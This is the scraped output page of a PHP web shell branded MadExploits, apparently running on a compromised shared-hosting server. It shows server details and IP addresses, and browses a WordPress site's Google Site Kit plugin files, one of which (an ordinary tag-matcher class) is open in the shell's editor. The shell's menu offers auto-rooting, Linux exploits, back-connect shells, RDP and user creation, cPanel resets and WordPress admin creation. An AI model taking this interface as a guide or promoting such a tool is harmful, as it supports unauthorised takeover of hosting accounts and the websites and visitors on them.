Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.118.205.75
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Modules /
Reader_Revenue_Manager /
[ HOME SHELL ]
Name
Size
Permission
Action
Settings.php
3.28
KB
-rw-r--r--
Tag_Guard.php
886
B
-rw-r--r--
Tag_Matchers.php
984
B
-rw-r--r--
Web_Tag.php
2.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Tag_Matchers.php
<?php /** * Class Google\Site_Kit\Modules\Reader_Revenue_Manager\Tag_Matchers * * @package Google\Site_Kit\Modules\Reader_Revenue_Manager * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Modules\Reader_Revenue_Manager; use Google\Site_Kit\Core\Modules\Tags\Module_Tag_Matchers; use Google\Site_Kit\Core\Tags\Tag_Matchers_Interface; /** * Class for Tag matchers. * * @since 1.132.0 * @access private * @ignore */ class Tag_Matchers extends Module_Tag_Matchers implements Tag_Matchers_Interface { /** * Holds array of regex tag matchers. * * @since 1.132.0 * * @return array Array of regex matchers. */ public function regex_matchers() { return array( "/<script\s+[^>]*src=['|\"]https?:\/\/news\.google\.com\/swg\/js\/v1\/swg-basic\.js['|\"][^>]*>/", '/\(self\.SWG_BASIC=self\.SWG_BASIC\|\|\[\]\)\.push/', ); } }
Close